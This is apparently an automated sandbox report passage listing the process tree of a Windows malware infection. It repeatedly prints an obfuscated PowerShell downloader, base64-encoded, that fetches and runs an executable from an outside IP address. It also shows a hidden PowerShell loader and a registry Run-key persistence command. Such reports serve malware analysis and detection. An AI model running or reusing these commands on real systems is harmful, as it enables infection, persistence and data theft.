          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbu